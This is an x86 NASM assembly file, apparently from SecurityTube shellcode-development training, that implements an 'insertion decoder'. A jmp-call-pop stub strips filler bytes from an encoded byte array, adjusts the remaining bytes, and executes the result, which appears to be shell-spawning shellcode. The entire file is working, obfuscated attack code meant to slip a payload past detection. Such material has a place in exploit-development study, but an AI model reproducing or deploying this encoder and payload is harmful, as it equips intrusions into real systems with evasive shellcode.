; Filename: insertion-decoder.nasm
; Author:  Vivek Ramachandran
; Website:  http://securitytube.net
; Training: http://securitytube-training.com 
;
;
; Purpose: 

global _start			
section .text

_start:
	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi +1]
	xor eax, eax
	mov al, 1
	xor ebx, ebx

decode: 
	mov bl, byte [esi + eax]
	xor bl, 0xe0 ; marker1
	jz short EncodedShellcode
	mov bl,byte [esi+eax+1]
	
	;rol bl, 1
	add bl, 1
	;not byte bl

	mov byte [edi],bl

	inc edi
	add al, 2
	jmp short decode	

call_shellcode:
	call decoder
	EncodedShellcode: db 0x30,0x03,0xbf,0x05,0x4f,0x03,0x67,0x07,0x2e,0x07,0x2e,0x07,0x72,0x02,0x67,0x04,0x67,0x04,0x2e,0x02,0x61,0x07,0x68,0x07,0x6d,0x05,0x88,0x05,0xe2,0x09,0x4f,0x0a,0x88,0x06,0xe1,0x04,0x52,0x09,0x88,0x03,0xe0,0x01,0xaf,0x08,0x0a,0x02,0xcc,0x04,0x7f,0x0a,0xe0,0xe0 ; marker2